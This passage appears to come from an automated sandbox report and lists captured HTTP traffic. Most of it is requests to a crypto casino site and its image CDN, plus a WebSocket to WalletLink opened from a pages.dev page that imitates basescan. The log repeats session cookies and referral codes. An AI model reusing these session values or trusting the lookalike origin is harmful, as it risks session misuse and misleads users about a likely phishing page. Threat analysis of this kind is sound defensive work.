visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: TYXqH4jap6PaE/mV9MTIHQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /assets/index-TJYR_fED.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/account2/remoteEntry.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/Block-LQQkMNS-.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /game/image/e77c37b458.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/93329c6f8b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/discord-3fjpJq_P.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/manifest-aca455c4.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/modules/lottery2/remoteEntry.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/bg-BlZBL8HD.svg HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/bonus2/assets/manifest-51a3674f.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/modules/bonus2/remoteEntry.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/account2/assets/manifest-e71017e8.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/modules/account2/remoteEntry.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /game/image/ca456564-e22a-47f9-ac2d-c70fad6c3534.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/d927716dbf.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /api/game/support/home/v3/recent-big-wins/?gameTypeId=0 HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /game/image/a131ebc530.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/d761cd69ed.jpg?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vip/badge-diamond.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /game/image/6cc52a28-40fc-4a5b-8169-66fd31642b72.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vip/badge-platinum.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /game/image/1b0425c6-d2cc-40af-8820-67eee4bc9b3b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/56c15419-5ce2-43a8-9700-23accc7661d0.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/1b0425c6-d2cc-40af-8820-67eee4bc9b3b.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/15029_Gates%20of%20Olympus%201000.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/init-c2a95928.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/modules/lottery2/assets/manifest-aca455c4.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/15029_Gates%20of%20Olympus%201000.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /test/?p=011923633b743 HTTP/1.1Host: socketv2.bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://bcgame.skSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; _gcl_au=1.1.1585837980.1727486212
